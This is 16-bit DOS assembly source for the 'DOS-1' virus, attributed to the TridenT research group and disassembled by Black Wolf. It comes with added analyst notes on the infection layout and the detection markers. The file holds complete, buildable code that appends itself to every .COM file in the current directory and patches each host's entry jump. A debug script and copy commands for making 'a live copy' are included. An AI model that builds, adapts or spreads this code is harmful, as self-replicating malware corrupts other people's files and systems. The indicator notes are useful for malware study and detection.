;DOS1 virus by the TridenT research group - Direct Action appending .COM
;This virus infects .COM files in the current directory using FCB's.
;Other than FCB use, the virus is VERY simple. Avoids infecting misnamed
;EXE files by using an 'M' at the beginning of files to mark infection.
;This virus requires a stub file made from the following debug script,
;to make it, compile the virus, then create the stub file by removing the
;semicolons from the code between the lines, saving it, and calling it
;vstub.hex. Then use the following commands:
; Debug <vstub.hex
; Copy /b vstub.com+dos1.com virus.com
;And you will have a live copy of the DOS-1 virus. Please be careful
;with it and do not release it.
;-=-=-=-=-=-=-=-=-=-=-=-=-=-[Begin Debug Script]-=-=-=-=-=-=-=-=-=-=-=-=-=
;e100 4d eb 6 90 90
;rbx
;0
;rcx
;5
;nvstub.com
;w
;q
;-=-=-=-=-=-=-=-=-=-=-=-=-=-[End Debug Script]-=-=-=-=-=-=-=-=-=-=-=-=-=
;Disassembly by Black Wolf
;
;Analyst notes (added during review, derived only from the code below):
;  Syntax/target: MASM/TASM, 16-bit real-mode DOS .COM (tiny model, org 100h).
;  Layout of the image as written to a victim (end_virus-start bytes):
;    start+0..3  "storage bytes" - in an infected host these hold the
;                host's ORIGINAL first 4 bytes (the FCB read at AH=27h
;                lands here because the DTA is pointed at SI = start).
;    start+4     Virus_Entry - the patched host jumps here.
;  Infected-file indicators visible in this source:
;    - File starts with 4Dh E9h ('M' + near JMP) followed by a 16-bit
;      displacement equal to the original file size (mov ax,0E94Dh / stosw).
;    - Body contains the strings 'DOS-1',0 and 'MK'.
;    - Directory search pattern is the FCB wildcard '????????COM'.
;  Infection limits encoded below: files whose first byte is 'M' are skipped
;  (so EXEs misnamed .COM, already-infected files, and any clean .COM that
;  happens to begin with 4Dh), and files larger than 0F800h bytes are skipped.
;  Register roles during the infection loop:
;    SI = runtime offset of 'start' (delta offset, recovered via call/pop)
;    DI = offset of the FCB (VirusDTA, filled in by FCB find-first/next)
;    DX = DS:DX argument for the various INT 21h FCB/DTA calls
;  Stack discipline: 100h is pushed at entry so the final 'retn' in ResetDTA
;  transfers to the restored host; one extra 'push dx' (the VirusDTA offset)
;  is live from open until CloseFile.
        .model  tiny
        .code
        org     100h
start:
        dec     bp                      ;4 bytes of placeholder host code;
        nop                             ;in a live infection this slot is
        int     20h                     ;overwritten with the host's first
                                        ;4 bytes (see AH=27h read below)
HostFile:                               ;Not present to preserve original compiler offsets.....
Virus_Entry:
        call    GetOffset               ;push address of Displacement (delta-offset trick)
Displacement:
        db      'DOS-1',0               ;name string; doubles as a scan signature
GetOffset:
        pop     si                      ;SI = runtime address of Displacement
        sub     si,offset Displacement-start ;SI = runtime address of 'start'
        cld                             ;string ops go forward
        mov     di,100h
        push    di                      ;Push DI on stack for ret... (retn in ResetDTA -> host at 100h)
        push    si                      ;Restore host file...
        movsw                           ;copy the 4 saved host bytes from start+0..3
        movsw                           ;back over 100h..103h
        pop     si                      ;SI = 'start' again
        lea     dx,[si+VirusDTA-start]  ;set DS:DX = DTA
        call    SetDTA
        mov     ax,1100h                ;Find first filename w/FCB's
FindFirstNext:
        lea     dx,[si+SearchString-start]
        int     21h                     ;Find first/next filename
                                        ;using FCB's (*.COM)
        or      al,al                   ;Were any .COM files found?
        jnz     ResetDTA                ;No.... exit virus.
        lea     dx,[si+VirusDTA-start]  ;the found-file FCB was written into the DTA
        mov     ah,0fh
        int     21h                     ;open .COM file w/FCB
        or      al,al                   ;Successful?
        jnz     FindNextFile            ;No - find another.
        push    dx                      ;Push offset of DTA (popped at CloseFile)
        mov     di,dx                   ;DI = FCB for the open file
        mov     word ptr [di+0Eh],1     ;Set bytes per record to 1 (FCB record size field)
        xor     ax,ax
        mov     [di+21h],ax             ;Set Random Record Num to 0
        mov     [di+23h],ax             ;? (high word of the 32-bit random record field)
        lea     dx,[si]
        call    SetDTA                  ;Set DTA to just before virus
                                        ;code in memory - Storage bytes..
        lea     dx,[di]                 ;DX = Virus DTA (i.e. the FCB)
        mov     ah,27h
        mov     cx,4
        int     21h                     ;Read first 4 bytes w/FCB (into start+0..3)
        cmp     byte ptr [si],'M'       ;Is it an EXE file or infected?
        je      CloseFile               ;exit... (also skips any clean file beginning with 4Dh)
        mov     ax,[di+10h]             ;AX = Filesize (low word of FCB file-size field)
        mov     [di+21h],ax             ;Set current record to EOF
        cmp     ax,0F800h               ;Is file above F800h bytes?
        ja      CloseFile               ;Too large, exit (unsigned compare)
        push    ax                      ;save filesize = JMP displacement for later
        lea     dx,[si]
        call    SetDTA                  ;Set DTA to storage bytes/virus.
        lea     dx,[di]
        mov     ah,28h
        mov     cx,end_virus-start      ;one 1-byte record per virus byte
        int     21h                     ;Write virus to end of file.
                                        ;(the image written includes the host's
                                        ;4 saved bytes at start+0..3)
        xor     ax,ax
        mov     [di+21h],ax             ;Reset file to beginning.
        lea     di,[si]                 ;Point DI to DTA (start+0, the storage bytes)
        mov     ax,0E94Dh               ;4dh E9h = marker and jump
        stosw
        pop     ax                      ;AX = jump size (original filesize)
        stosw                           ;Put marker and jump into DTA
        push    dx                      ;DX still = FCB; preserve across SetDTA
        lea     dx,[si]
        call    SetDTA                  ;Set DTA for write
        pop     dx
        mov     ah,28h
        mov     cx,4
        int     21h                     ;Write in ID byte 'M' and jump
CloseFile:
        pop     dx                      ;DX = VirusDTA offset pushed after open
        call    SetDTA                  ;restore DTA so find-next keeps working
        mov     ah,10h
        int     21h                     ;Close file w/FCB
FindNextFile:
        mov     ah,12h
        jmp     short FindFirstNext     ;Find next file...
ResetDTA:
        mov     dx,80h                  ;80h = default DTA
        call    SetDTA
        retn                            ;pops the 100h pushed at entry -> run host
SetDTA:
        mov     ah,1Ah
        int     21h                     ;Set DTA to DS:DX
        retn
        db      'MK'                    ;Musad Khafir's signature
SearchString:
        db      0                       ;Default Drive
        db      '????????COM'           ;Search for all .COM files.
end_virus:
        org     1d1h                    ;DTA/FCB scratch area placed past the written image
                                        ;(presumably end_virus <= 1D1h; not verified here)
VirusDTA:
        end     start